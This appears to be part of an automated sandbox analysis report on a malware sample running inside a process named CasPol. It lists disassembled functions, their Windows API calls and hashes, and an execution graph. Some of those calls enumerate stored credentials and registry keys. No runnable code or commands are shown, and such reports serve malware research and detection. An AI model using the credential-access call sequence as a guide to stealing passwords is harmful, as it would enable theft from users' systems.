                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                                                    • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:3%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:22.9%
                                                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                                                    Total number of Nodes:969
                                                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                                                    execution_graph 34262 40fc40 70 API calls 34437 403640 21 API calls 34263 427fa4 42 API calls 34438 412e43 _endthreadex 34439 425115 76 API calls __fprintf_l 34440 43fe40 133 API calls 34266 425115 83 API calls __fprintf_l 34267 401445 memcpy memcpy DialogBoxParamA 34268 440c40 34 API calls 33237 444c4a 33256 444e38 33237->33256 33239 444c56 GetModuleHandleA 33240 444c68 __set_app_type __p__fmode __p__commode 33239->33240 33242 444cfa 33240->33242 33243 444d02 __setusermatherr 33242->33243 33244 444d0e 33242->33244 33243->33244 33257 444e22 _controlfp 33244->33257 33246 444d13 _initterm __getmainargs _initterm 33247 444d6a GetStartupInfoA 33246->33247 33249 444d9e GetModuleHandleA 33247->33249 33258 40cf44 33249->33258 33253 444dcf _cexit 33255 444e04 33253->33255 33254 444dc8 exit 33254->33253 33256->33239 33257->33246 33309 404a99 LoadLibraryA 33258->33309 33260 40cf60 33295 40cf64 33260->33295 33317 410d0e 33260->33317 33262 40cf6f 33321 40ccd7 ??2@YAPAXI 33262->33321 33264 40cf9b 33335 407cbc 33264->33335 33269 40cfc4 33353 409825 memset 33269->33353 33270 40cfd8 33358 4096f4 memset 33270->33358 33275 407e30 _strcmpi 33277 40cfee 33275->33277 33276 40d181 ??3@YAXPAX 33278 40d1b3 33276->33278 33279 40d19f DeleteObject 33276->33279 33281 40cff2 RegDeleteKeyA 33277->33281 33282 40d007 EnumResourceTypesA 33277->33282 33382 407948 free free 33278->33382 33279->33278 33281->33276 33284 40d047 33282->33284 33285 40d02f MessageBoxA 33282->33285 33283 40d1c4 33383 4080d4 33283->33383 33287 40d0a0 CoInitialize 33284->33287 33363 40ce70 33284->33363 33285->33276 33380 40cc26 strncat memset RegisterClassA CreateWindowExA 33287->33380 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33381 40c256 PostMessageA 33293->33381 33295->33253 33295->33254 33296 40d061 ??3@YAXPAX 33296->33278 33299 40d084 DeleteObject 33296->33299 33297 40d09e 33297->33287 33299->33278 33301 40d0f9 GetMessageA 33302 40d17b CoUninitialize 33301->33302 33303 40d10d 33301->33303 33302->33276 33304 40d113 TranslateAccelerator 33303->33304 33306 40d145 IsDialogMessage 33303->33306 33307 40d139 IsDialogMessage 33303->33307 33304->33303 33305 40d16d GetMessageA 33304->33305 33305->33302 33305->33304 33306->33305 33308 40d157 TranslateMessage DispatchMessageA 33306->33308 33307->33305 33307->33306 33308->33305 33310 404ac4 GetProcAddress 33309->33310 33311 404aec 33309->33311 33312 404ad4 33310->33312 33313 404add FreeLibrary 33310->33313 33315 404b13 33311->33315 33316 404afc MessageBoxA 33311->33316 33312->33313 33313->33311 33314 404ae8 33313->33314 33314->33311 33315->33260 33316->33260 33318 410d17 LoadLibraryA 33317->33318 33319 410d3c 33317->33319 33318->33319 33320 410d2b GetProcAddress 33318->33320 33319->33262 33320->33319 33322 40cd08 ??2@YAPAXI 33321->33322 33324 40cd26 33322->33324 33325 40cd2d 33322->33325 33394 404025 6 API calls 33324->33394 33327 40cd66 33325->33327 33328 40cd59 DeleteObject 33325->33328 33387 407088 33327->33387 33328->33327 33330 40cd6b 33390 4019b5 33330->33390 33333 4019b5 strncat 33334 40cdbf _mbscpy 33333->33334 33334->33264 33396 407948 free free 33335->33396 33337 407e04 33397 407a55 33337->33397 33340 407a1f malloc memcpy free free 33347 407cf7 33340->33347 33341 407ddc 33341->33337 33418 407a1f 33341->33418 33343 407d7a free 33343->33347 33347->33337 33347->33340 33347->33341 33347->33343 33400 40796e strlen 33347->33400 33410 406f30 33347->33410 33348 40796e 7 API calls 33348->33337 33349 407e30 33350 407e38 33349->33350 33351 407e57 33349->33351 33350->33351 33352 407e41 _strcmpi 33350->33352 33351->33269 33351->33270 33352->33350 33352->33351 33423 4097ff 33353->33423 33355 409854 33428 409731 33355->33428 33359 4097ff 3 API calls 33358->33359 33360 409723 33359->33360 33448 40966c GetFileAttributesA GetPrivateProfileStringA _mbscpy _mbscpy GetPrivateProfileIntA 33360->33448 33362 40972b 33362->33275 33449 4023b2 33363->33449 33369 40ced3 33544 40cdda 7 API calls 33369->33544 33370 40cece 33373 40cf3f 33370->33373 33490 40c3d0 memset GetModuleFileNameA strrchr 33370->33490 33373->33296 33373->33297 33376 40ceed 33518 40affa 33376->33518 33380->33293 33381->33301 33382->33283 33384 4080e1 33383->33384 33385 4080da free 33383->33385 33386 407948 free free 33384->33386 33385->33384 33386->33295 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33330 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33333 33394->33325 33395->33389 33396->33347 33398 407a65 33397->33398 33399 407a5b free 33397->33399 33398->33349 33399->33398 33401 4079a1 33400->33401 33402 407998 free 33400->33402 33404 406f30 3 API calls 33401->33404 33403 4079ab 33402->33403 33405 4079c4 33403->33405 33406 4079bb free 33403->33406 33404->33403 33408 406f30 3 API calls 33405->33408 33407 4079d0 memcpy 33406->33407 33407->33347 33409 4079cf 33408->33409 33409->33407 33411 406f37 malloc 33410->33411 33412 406f7d 33410->33412 33414 406f73 33411->33414 33415 406f58 33411->33415 33412->33347 33414->33347 33416 406f6c free 33415->33416 33417 406f5c memcpy 33415->33417 33416->33414 33417->33416 33419 407a38 33418->33419 33420 407a2d free 33418->33420 33422 406f30 3 API calls 33419->33422 33421 407a43 33420->33421 33421->33348 33422->33421 33439 406f96 GetModuleFileNameA 33423->33439 33425 409805 strrchr 33426 409814 33425->33426 33427 409817 _mbscat 33425->33427 33426->33427 33427->33355 33440 44b090 33428->33440 33433 40930c 3 API calls 33434 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33433->33434 33435 4097c5 LoadStringA 33434->33435 33438 4097db 33435->33438 33437 4097f3 33437->33276 33438->33435 33438->33437 33447 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33438->33447 33439->33425 33441 40973e _mbscpy _mbscpy 33440->33441 33442 40930c 33441->33442 33443 44b090 33442->33443 33444 409319 memset GetPrivateProfileStringA 33443->33444 33445 409374 33444->33445 33446 409364 WritePrivateProfileStringA 33444->33446 33445->33433 33446->33445 33447->33438 33448->33362 33545 409c1c 33449->33545 33452 401e69 memset 33584 410dbb 33452->33584 33455 401ec2 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33455->33615 33456 401ed4 33600 406f81 GetFileAttributesA 33456->33600 33459 401ee6 strlen strlen 33461 401f15 33459->33461 33462 401f28 33459->33462 33616 4070e3 strlen _mbscat _mbscpy _mbscat 33461->33616 33601 406f81 GetFileAttributesA 33462->33601 33465 401f35 33602 401c31 33465->33602 33468 401f75 33614 410a9c RegOpenKeyExA 33468->33614 33469 401c31 7 API calls 33469->33468 33471 401f91 33472 402187 33471->33472 33473 401f9c memset 33471->33473 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33617 410b62 RegEnumKeyExA 33473->33617 33626 406f81 GetFileAttributesA 33475->33626 33476->33369 33476->33370 33478 40217e RegCloseKey 33478->33472 33479 401fd9 atoi 33480 401fef memset memset sprintf 33479->33480 33488 401fc9 33479->33488 33618 410b1e 33480->33618 33483 402165 33483->33478 33484 406f81 GetFileAttributesA 33484->33488 33485 402076 memset memset strlen strlen 33485->33488 33486 4070e3 strlen _mbscat _mbscpy _mbscat 33486->33488 33487 4020dd strlen strlen 33487->33488 33488->33478 33488->33479 33488->33483 33488->33484 33488->33485 33488->33486 33488->33487 33489 402167 _mbscpy 33488->33489 33625 410b62 RegEnumKeyExA 33488->33625 33489->33478 33491 40c422 33490->33491 33492 40c425 _mbscat _mbscpy _mbscpy 33490->33492 33491->33492 33493 40c49d 33492->33493 33494 40c512 33493->33494 33495 40c502 GetWindowPlacement 33493->33495 33496 40c538 33494->33496 33647 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33494->33647 33495->33494 33640 409b31 33496->33640 33500 40ba28 33501 40ba87 33500->33501 33507 40ba3c 33500->33507 33650 406c62 LoadCursorA SetCursor 33501->33650 33503 40ba8c 33651 410a9c RegOpenKeyExA 33503->33651 33652 4107f1 33503->33652 33655 410808 33503->33655 33659 404734 33503->33659 33667 404785 33503->33667 33670 403c16 33503->33670 33504 40ba43 _mbsicmp 33504->33507 33505 40baa0 33506 407e30 _strcmpi 33505->33506 33510 40bab0 33506->33510 33507->33501 33507->33504 33744 40b5e5 10 API calls 33507->33744 33508 40bafa SetCursor 33508->33376 33510->33508 33511 40baf1 qsort 33510->33511 33511->33508 34204 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33518->34204 33520 40b00e 33521 40b016 33520->33521 33522 40b01f GetStdHandle 33520->33522 34205 406d1a CreateFileA 33521->34205 33524 40b01c 33522->33524 33525 40b035 33524->33525 33526 40b12d 33524->33526 34206 406c62 LoadCursorA SetCursor 33525->34206 34210 406d77 9 API calls 33526->34210 33529 40b136 33539 40c580 33529->33539 33530 40b087 33537 40b0a1 33530->33537 34208 40a699 12 API calls 33530->34208 33531 40b042 33531->33530 33531->33537 34207 40a57c strlen WriteFile 33531->34207 33534 40b0d6 33535 40b116 CloseHandle 33534->33535 33536 40b11f SetCursor 33534->33536 33535->33536 33536->33529 33537->33534 34209 406d77 9 API calls 33537->34209 33540 40c597 33539->33540 33541 40c58b 33539->33541 33540->33373 34211 404156 33541->34211 33544->33370 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 408db6 12 API calls 33549->33550 33551 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33551 33550->33549 33552 409d8b 33551->33552 33554 409d54 ??2@YAPAXI 33551->33554 33567 409b9c 33552->33567 33554->33552 33556 4023c1 33556->33452 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 free 33567->33568 33569 409ba5 33568->33569 33570 407a55 free 33569->33570 33571 409bad 33570->33571 33572 407a55 free 33571->33572 33573 409bb5 33572->33573 33574 407a55 free 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33627 4070ae 33586->33627 33588 410e1d 33587->33588 33630 410a9c RegOpenKeyExA 33588->33630 33592 410dee SHGetSpecialFolderPathA 33593 401e9e strlen strlen 33592->33593 33593->33455 33593->33456 33594 410e4a 33595 410e7f _mbscpy 33594->33595 33631 410d3d _mbscpy 33594->33631 33595->33593 33597 410e5b 33632 410add RegQueryValueExA 33597->33632 33599 410e73 RegCloseKey 33599->33595 33600->33459 33601->33465 33633 410a9c RegOpenKeyExA 33602->33633 33604 401c4c 33605 401cad 33604->33605 33634 410add RegQueryValueExA 33604->33634 33605->33468 33605->33469 33607 401c6a 33608 401c71 strchr 33607->33608 33609 401ca4 RegCloseKey 33607->33609 33608->33609 33610 401c85 strchr 33608->33610 33609->33605 33610->33609 33611 401c94 33610->33611 33635 406f06 strlen 33611->33635 33613 401ca1 33613->33609 33614->33471 33615->33456 33616->33462 33617->33488 33638 410a9c RegOpenKeyExA 33618->33638 33620 410b34 33621 410b5d 33620->33621 33639 410add RegQueryValueExA 33620->33639 33621->33488 33623 410b4c RegCloseKey 33623->33621 33625->33488 33626->33476 33628 4070bd GetVersionExA 33627->33628 33629 4070ce 33627->33629 33628->33629 33629->33587 33629->33592 33630->33594 33631->33597 33632->33599 33633->33604 33634->33607 33636 406f17 33635->33636 33637 406f1a memcpy 33635->33637 33636->33637 33637->33613 33638->33620 33639->33623 33641 409b40 33640->33641 33643 409b4e 33640->33643 33648 409901 memset SendMessageA 33641->33648 33644 409b99 33643->33644 33645 409b8b 33643->33645 33644->33500 33649 409868 SendMessageA 33645->33649 33647->33496 33648->33643 33649->33644 33650->33503 33651->33505 33653 410807 33652->33653 33654 4107fc FreeLibrary 33652->33654 33653->33505 33654->33653 33656 410816 33655->33656 33657 4107f1 FreeLibrary 33656->33657 33658 410825 33657->33658 33658->33505 33660 404785 FreeLibrary 33659->33660 33661 40473b LoadLibraryA 33660->33661 33662 40474c GetProcAddress 33661->33662 33665 40476e 33661->33665 33663 404764 33662->33663 33662->33665 33663->33665 33664 404781 33664->33505 33665->33664 33666 404785 FreeLibrary 33665->33666 33666->33664 33668 4047a3 33667->33668 33669 404799 FreeLibrary 33667->33669 33668->33505 33669->33668 33671 4107f1 FreeLibrary 33670->33671 33672 403c30 LoadLibraryA 33671->33672 33673 403c5e 33672->33673 33674 403c44 GetProcAddress 33672->33674 33675 4107f1 FreeLibrary 33673->33675 33676 403c6b 33673->33676 33674->33673 33675->33676 33677 404734 3 API calls 33676->33677 33678 403c86 33677->33678 33745 4036e5 33678->33745 33681 4036e5 27 API calls 33682 403c9a 33681->33682 33683 4036e5 27 API calls 33682->33683 33684 403ca4 33683->33684 33685 4036e5 27 API calls 33684->33685 33686 403cae 33685->33686 33757 4085d2 33686->33757 33694 403ce5 33695 403cf7 33694->33695 33945 402bd1 40 API calls 33694->33945 33805 410a9c RegOpenKeyExA 33695->33805 33698 403d0a 33699 403d1c 33698->33699 33946 402bd1 40 API calls 33698->33946 33806 402c5d 33699->33806 33703 4070ae GetVersionExA 33704 403d31 33703->33704 33824 410a9c RegOpenKeyExA 33704->33824 33706 403d51 33707 403d61 33706->33707 33825 402b22 memset 33706->33825 33834 410a9c RegOpenKeyExA 33707->33834 33710 403d87 33711 403d97 33710->33711 33712 402b22 47 API calls 33710->33712 33835 410a9c RegOpenKeyExA 33711->33835 33712->33711 33714 403dbd 33715 403dcd 33714->33715 33716 402b22 47 API calls 33714->33716 33717 410808 FreeLibrary 33715->33717 33716->33715 33718 403ddd 33717->33718 33719 404785 FreeLibrary 33718->33719 33720 403de8 33719->33720 33836 402fdb 33720->33836 33723 402fdb 34 API calls 33724 403e00 33723->33724 33852 4032b7 33724->33852 33733 403e3b 33735 403e73 33733->33735 33736 403e46 _mbscpy 33733->33736 33899 40fb00 33735->33899 33948 40f334 334 API calls 33736->33948 33744->33507 33746 4037c5 33745->33746 33747 4036fb 33745->33747 33746->33681 33949 410863 UuidFromStringA UuidFromStringA 33747->33949 33750 403716 strchr 33750->33746 33751 403730 33750->33751 33953 4021b6 memset 33751->33953 33753 40373f _mbscpy _mbscpy strlen 33754 4037a4 _mbscpy 33753->33754 33755 403789 sprintf 33753->33755 33954 4023e5 16 API calls 33754->33954 33755->33754 33758 4085e2 33757->33758 33955 4082cd 11 API calls 33758->33955 33762 408600 33763 403cba 33762->33763 33764 40860b memset 33762->33764 33775 40821d 33763->33775 33958 410b62 RegEnumKeyExA 33764->33958 33766 4086d2 RegCloseKey 33766->33763 33768 408637 33768->33766 33769 40865c memset 33768->33769 33959 410a9c RegOpenKeyExA 33768->33959 33962 410b62 RegEnumKeyExA 33768->33962 33960 410add RegQueryValueExA 33769->33960 33772 408694 33961 40848b 10 API calls 33772->33961 33774 4086ab RegCloseKey 33774->33768 33963 410a9c RegOpenKeyExA 33775->33963 33777 40823f 33778 403cc6 33777->33778 33779 408246 memset 33777->33779 33787 4086e0 33778->33787 33964 410b62 RegEnumKeyExA 33779->33964 33781 4082bf RegCloseKey 33781->33778 33783 40826f 33783->33781 33965 410a9c RegOpenKeyExA 33783->33965 33966 4080ed 11 API calls 33783->33966 33967 410b62 RegEnumKeyExA 33783->33967 33786 4082a2 RegCloseKey 33786->33783 33968 4045db 33787->33968 33790 4088ef 33976 404656 33790->33976 33792 40872d 33792->33790 33795 408737 wcslen 33792->33795 33794 40872b CredEnumerateW 33794->33792 33795->33790 33801 40876a 33795->33801 33796 40877a wcsncmp 33796->33801 33798 404734 3 API calls 33798->33801 33799 404785 FreeLibrary 33799->33801 33800 408812 memset 33800->33801 33802 40883c memcpy wcschr 33800->33802 33801->33790 33801->33796 33801->33798 33801->33799 33801->33800 33801->33802 33803 4088c3 LocalFree 33801->33803 33979 40466b _mbscpy 33801->33979 33802->33801 33803->33801 33804 410a9c RegOpenKeyExA 33804->33694 33805->33698 33980 410a9c RegOpenKeyExA 33806->33980 33808 402c7a 33809 402da5 33808->33809 33810 402c87 memset 33808->33810 33809->33703 33981 410b62 RegEnumKeyExA 33810->33981 33812 402d9c RegCloseKey 33812->33809 33813 410b1e 3 API calls 33814 402ce4 memset sprintf 33813->33814 33982 410a9c RegOpenKeyExA 33814->33982 33816 402d28 33817 402d3a sprintf 33816->33817 33985 402bd1 40 API calls 33816->33985 33983 410a9c RegOpenKeyExA 33817->33983 33822 402cb2 33822->33812 33822->33813 33823 402d9a 33822->33823 33984 410b62 RegEnumKeyExA 33822->33984 33986 402bd1 40 API calls 33822->33986 33823->33812 33824->33706 33987 410b62 RegEnumKeyExA 33825->33987 33827 402bbb RegCloseKey 33827->33707 33828 406f06 2 API calls 33830 402b58 33828->33830 33830->33827 33830->33828 33833 402bb8 33830->33833 33988 410a9c RegOpenKeyExA 33830->33988 33989 402a9d memset 33830->33989 33997 410b62 RegEnumKeyExA 33830->33997 33833->33827 33834->33710 33835->33714 34037 410a9c RegOpenKeyExA 33836->34037 33838 402ff9 33839 403006 memset 33838->33839 33840 40312c 33838->33840 34038 410b62 RegEnumKeyExA 33839->34038 33840->33723 33842 403122 RegCloseKey 33842->33840 33843 410b1e 3 API calls 33844 403058 memset sprintf 33843->33844 34039 410a9c RegOpenKeyExA 33844->34039 33846 4030a2 memset 34040 410b62 RegEnumKeyExA 33846->34040 33848 410b62 RegEnumKeyExA 33851 403033 33848->33851 33849 4030f9 RegCloseKey 33849->33851 33851->33842 33851->33843 33851->33846 33851->33848 33851->33849 34041 402db3 26 API calls 33851->34041 33853 4032d5 33852->33853 33854 4033a9 33852->33854 34042 4021b6 memset 33853->34042 33867 4034e4 memset memset 33854->33867 33856 4032e1 34043 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33856->34043 33858 4032ea 33859 4032f8 memset GetPrivateProfileSectionA 33858->33859 34044 4023e5 16 API calls 33858->34044 33859->33854 33864 40332f 33859->33864 33861 40339b strlen 33861->33854 33861->33864 33863 403350 strchr 33863->33864 33864->33854 33864->33861 34045 4021b6 memset 33864->34045 34046 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33864->34046 34047 4023e5 16 API calls 33864->34047 33868 410b1e 3 API calls 33867->33868 33869 40353f 33868->33869 33870 40357f 33869->33870 33871 403546 _mbscpy 33869->33871 33875 403985 33870->33875 34048 406d55 strlen _mbscat 33871->34048 33873 403565 _mbscat 34049 4033f0 19 API calls 33873->34049 34050 40466b _mbscpy 33875->34050 33879 4039aa 33881 4039ff 33879->33881 34051 40f460 memset memset 33879->34051 34072 40f6e2 33879->34072 34088 4038e8 21 API calls 33879->34088 33882 404785 FreeLibrary 33881->33882 33883 403a0b 33882->33883 33884 4037ca memset memset 33883->33884 34096 444551 memset 33884->34096 33886 4038e2 33886->33733 33947 40f334 334 API calls 33886->33947 33889 40382e 33890 406f06 2 API calls 33889->33890 33891 403843 33890->33891 33892 406f06 2 API calls 33891->33892 33893 403855 strchr 33892->33893 33894 403884 _mbscpy 33893->33894 33895 403897 strlen 33893->33895 33896 4038bf _mbscpy 33894->33896 33895->33896 33897 4038a4 sprintf 33895->33897 34108 4023e5 16 API calls 33896->34108 33897->33896 33900 44b090 33899->33900 33901 40fb10 RegOpenKeyExA 33900->33901 33902 403e7f 33901->33902 33903 40fb3b RegOpenKeyExA 33901->33903 33913 40f96c 33902->33913 33904 40fb55 RegQueryValueExA 33903->33904 33905 40fc2d RegCloseKey 33903->33905 33906 40fc23 RegCloseKey 33904->33906 33907 40fb84 33904->33907 33905->33902 33906->33905 33908 404734 3 API calls 33907->33908 33909 40fb91 33908->33909 33909->33906 33910 40fc19 LocalFree 33909->33910 33911 40fbdd memcpy memcpy 33909->33911 33910->33906 34113 40f802 11 API calls 33911->34113 33914 4070ae GetVersionExA 33913->33914 33915 40f98d 33914->33915 33916 4045db 7 API calls 33915->33916 33924 40f9a9 33916->33924 33917 40fae6 33918 404656 FreeLibrary 33917->33918 33919 403e85 33918->33919 33925 4442ea memset 33919->33925 33920 40fa13 memset WideCharToMultiByte 33921 40fa43 _strnicmp 33920->33921 33920->33924 33922 40fa5b WideCharToMultiByte 33921->33922 33921->33924 33923 40fa88 WideCharToMultiByte 33922->33923 33922->33924 33923->33924 33924->33917 33924->33920 33926 410dbb 10 API calls 33925->33926 33927 444329 33926->33927 34114 40759e strlen strlen 33927->34114 33932 410dbb 10 API calls 33933 444350 33932->33933 33934 40759e 3 API calls 33933->33934 33935 44435a 33934->33935 33936 444212 65 API calls 33935->33936 33937 444366 memset memset 33936->33937 33938 410b1e 3 API calls 33937->33938 33939 4443b9 ExpandEnvironmentStringsA strlen 33938->33939 33940 4443f4 _strcmpi 33939->33940 33941 4443e5 33939->33941 33942 403e91 33940->33942 33943 44440c 33940->33943 33941->33940 33942->33505 33944 444212 65 API calls 33943->33944 33944->33942 33945->33695 33946->33699 33947->33733 33948->33735 33950 40370e 33949->33950 33951 41088d 33949->33951 33950->33746 33950->33750 33951->33950 